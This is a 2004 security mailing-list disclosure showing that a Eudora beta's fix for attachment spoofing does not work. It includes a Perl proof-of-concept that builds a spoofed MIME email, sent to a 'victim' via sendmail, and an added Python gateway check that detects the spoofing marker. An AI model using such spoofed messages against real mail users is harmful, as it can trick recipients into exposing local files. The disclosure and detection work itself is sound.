Eudora attachment spoof

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 10/11/04

    Date:         Mon, 11 Oct 2004 08:23:53 +1000

    Eudora for Windows is in beta testing since 8 Oct 2004. The release

    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Not so. Harmless demo below.


    Paul Szabo -
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files (after a warning?)
    if the message was forwarded (not replied to).\n";

    print "\n--zzz\n";
    print "Content-Type: text/html; name=\"qp.txt\"\n";
    print "Content-Transfer-Encoding: quoted-printable \n";
    print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
    print "Within text/html part, use </x-html> to get back to plaintext,
    no need for NUL or linebreak or nothing:\n";
    print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted=
    : \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

    print "\n--zzz--\n";
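
A mail-gateway check for the marker this demo relies on, added here as an example and not part of the original post: it undoes base64 and quoted-printable on every text part and reports any "Attachment Converted" line it finds. The function names are hypothetical and the sample message is constructed to mirror the demo's quoted-printable part, including the trailing space in its Content-Transfer-Encoding header.

```python
import base64, binascii, quopri, re
from email import message_from_bytes

# In-band marker from the post; the quoted path is what would be shown as attached.
MARKER = re.compile(rb'Attachment Converted[ \t]*:[ \t]*"([^"\r\n]*)"')

def decode_part(part):
    """Undo the transfer encoding ourselves, tolerating sloppy header values."""
    raw = part.get_payload(decode=False)
    if isinstance(raw, str):
        raw = raw.encode("utf-8", "surrogateescape")
    # Trim whitespace: the demo's header reads "quoted-printable " (trailing space).
    cte = str(part.get("Content-Transfer-Encoding", "")).strip().lower()
    if cte == "quoted-printable":
        return quopri.decodestring(raw)   # also removes "=\n" soft line breaks
    if cte == "base64":
        try:
            return base64.b64decode(raw)
        except binascii.Error:
            return raw                    # undecodable: scan the raw bytes
    return raw

def find_attachment_markers(raw_message):
    """Return (content_type, claimed_path) for each marker inside a text part."""
    hits = []
    for part in message_from_bytes(raw_message).walk():
        if part.is_multipart() or part.get_content_maintype() != "text":
            continue
        # Drop NULs so the "=00" variant collapses to the plain marker.
        body = decode_part(part).replace(b"\x00", b"")
        for m in MARKER.finditer(body):
            hits.append((part.get_content_type(), m.group(1).decode("latin-1")))
    return hits

# Constructed sample mirroring the three variants in the demo above.
SAMPLE = (b'MIME-Version: 1.0\n'
          b'Content-Type: multipart/mixed; boundary="zzz"\n\n'
          b'--zzz\nContent-Type: text/plain\n\nhello\n'
          b'--zzz\nContent-Type: text/html; name="qp.txt"\n'
          b'Content-Transfer-Encoding: quoted-printable \n\n'
          b'Attachment Converted=00: "c:\\winnt\\system32\\calc.exe"\n'
          b'Attachment Converted=\n: "c:\\winnt\\system32\\calc.exe"\n'
          b'Attachment Converted: "c:\\winnt\\system32\\calc.exe"\n'
          b'\n--zzz--\n')

if __name__ == "__main__":
    for content_type, path in find_attachment_markers(SAMPLE):
        print(f"marker in {content_type} part claims attachment {path}")
```

What to do with a hit (quarantine, defang the line, tag the subject) is left to the deployment.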
